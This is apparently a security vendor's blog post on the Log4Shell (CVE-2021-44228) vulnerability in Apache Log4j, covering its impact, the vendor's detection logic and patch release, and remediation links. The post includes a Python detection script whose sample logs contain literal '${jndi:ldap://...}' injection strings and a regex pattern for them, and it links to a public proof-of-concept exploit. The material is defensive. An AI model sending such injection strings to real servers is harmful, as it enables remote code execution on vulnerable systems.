Note: this blog was updated on December 20, 2021, and we will continue to make updates as more technical information becomes available.

Exploit Background
The Log4j exploit targets a vulnerability in Log4j, an open source Apache logging framework, that allows attackers to gain arbitrary code execution on an affected device. Because Log4j is used widely in modern Java applications (even some non-enterprise ones like Minecraft), services are scrambling to defend against this vulnerability. The earliest evidence of this exploit was found on December 1st, according to Cloudflare CEO Matthew Prince.

This vulnerability can be exploited by sending a single crafted string that is then logged by Log4j versions 2.0 and up. Users on Twitter, Minecraft, and iCloud have been seen changing their usernames or posting chat messages that include the string and successfully gaining access. The exploit can also be used to read server environment variables, which in some cases exposes static credentials without full remote code execution.

The situation with this exploit is ongoing as researchers continue to find affected applications and further holes in the logging framework. Some have dubbed this situation 'Log4Shell'. More information on this CVE can be found here.

Impact
Currently, the Log4j vulnerability is causing a sharp uptick in traffic containing the triggering string. Though most hosts are able to defend against it by layering security measures, discontinuing use of some Java applications, or dropping/banning traffic, others are scrambling to review their assets for any inclusion of Log4j or components that use the framework.

Arbitrary code execution can result in catastrophic damage, as it allows near-full access to all server resources. After successfully triggering the vulnerability, attackers can upload scripts to the server that retrieve files, use the server for DDoS attacks, monitor the server, and more.

Needless to say, this vulnerability has been classified as Critical (10.0 severity) under CVSS version 3 and is highly dangerous. As a result, we have put together some automation and this release to help our customers.

Automation Logic

  • Detection
    In response to this vulnerability, we have implemented logic to detect it in customer instances. This detection first searches for items using LDAP and certain ports associated with LDAP. It also searches for unusual URIs (which would find attempts using the crafted string). After assigning scores and sorting by least frequent/unusual hosts, cases are created for triage.

  • New Release
    In our new release, Milestone 86, we've implemented the Apache-recommended fix to prevent attempts against our instances. We've also done thorough checks of customer instances and reviewed known customer assets for notifications.

    The Apache recommendation, though followed for this release, has since been invalidated by Apache, and instances relying on it alone remain vulnerable. A later release is in progress to further patch issues related to Log4j. Please keep an eye on our latest releases page for details.
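As an added illustration of the detection approach described above (example code written for this post, not LogicHub's own detection logic), the following scans constructed web-server log lines for JNDI lookup strings and LDAP-associated ports, scores each line, and sorts hits so the least frequent source hosts come first for triage. The hosts, paths and port list are constructed assumptions.

```python
import re
from collections import Counter

# Constructed sample access-log lines with hypothetical hosts; not real traffic.
SAMPLE_LOGS = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.5 - - "GET /about HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.5 - - "GET /contact HTTP/1.1" 200 "Mozilla/5.0"',
    '203.0.113.9 - - "GET /login HTTP/1.1" 200 "${jndi:ldap://203.0.113.9:1389/a}"',
    '198.51.100.7 - - "GET /${jndi:ldap://198.51.100.7:389/x} HTTP/1.1" 404 "curl/7.79"',
]

# Core lookup pattern the detection looks for, plus ports commonly tied to LDAP.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*(ldap|ldaps|rmi|dns)", re.IGNORECASE)
LDAP_PORTS = {"389", "636", "1389"}  # assumed watch-list, extend per environment
PORT_RE = re.compile(r"://[^/\s]+?:(\d+)")


def normalize(line):
    """Collapse nested ${lower:..}/${upper:..} lookups so the core pattern is visible."""
    prev = None
    while prev != line:
        prev = line
        line = re.sub(r"\$\{\s*(?:lower|upper)\s*:\s*([^{}]*)\}", r"\1",
                      line, flags=re.IGNORECASE)
    return line


def score_line(line):
    """Return a suspicion score: 0 = nothing found, higher = more indicators."""
    norm = normalize(line)
    score = 5 if JNDI_RE.search(norm) else 0
    score += sum(2 for port in PORT_RE.findall(norm) if port in LDAP_PORTS)
    return score


def triage(lines):
    """Return (source_host, score) for scored lines, rarest host first."""
    host_freq = Counter(line.split()[0] for line in lines)
    hits = [(line.split()[0], score_line(line)) for line in lines if score_line(line)]
    # Least frequent hosts first, then highest score; these become triage cases.
    hits.sort(key=lambda hit: (host_freq[hit[0]], -hit[1]))
    return hits


if __name__ == "__main__":
    for host, score in triage(SAMPLE_LOGS):
        print(f"{host}\tscore={score}")
```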

Remediation
Within LogicHub, please ensure you keep up with our latest instance version releases as they become available. We will continue to monitor for additional instances of this activity and for new attacks under the Log4j vulnerability umbrella.

Please also follow the advice given on the Apache remediation page for devices that are not running LogicHub instances. Please see the Sources section of this release for more information.

Relevant Sources and Further Reading
Watch LogicHub's coverage of the Log4j library zero-day on LogicHub's Monthly Security RoundUp.

Read LogicHub's December Monthly Security Roundup for more information about other threats we're finding in the wild.

Join us on the 15th of each month @ 10:00am PT/ 1:00pm ET for LogicHub’s Monthly Security RoundUp on the LogicHub webinar channel.

Proof of Concept: https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce

Demo from Marcus Hutchins (MalwareTechBlog): https://www.youtube.com/watch?v=0-abhd-CLwQ

Article from Wired (for a user-friendly understanding of how this is affecting the internet as a whole): https://www.wired.com/story/log4j-flaw-hacking-internet/

LogicHub Milestone 86 Release Notes: https://help.logichub.com/changelog/milestone-86#fix-for-log4j---cve-2021-44228

Apache Logging Security Vulnerabilities (includes mitigations and other information): https://logging.apache.org/log4j/2.x/security.html
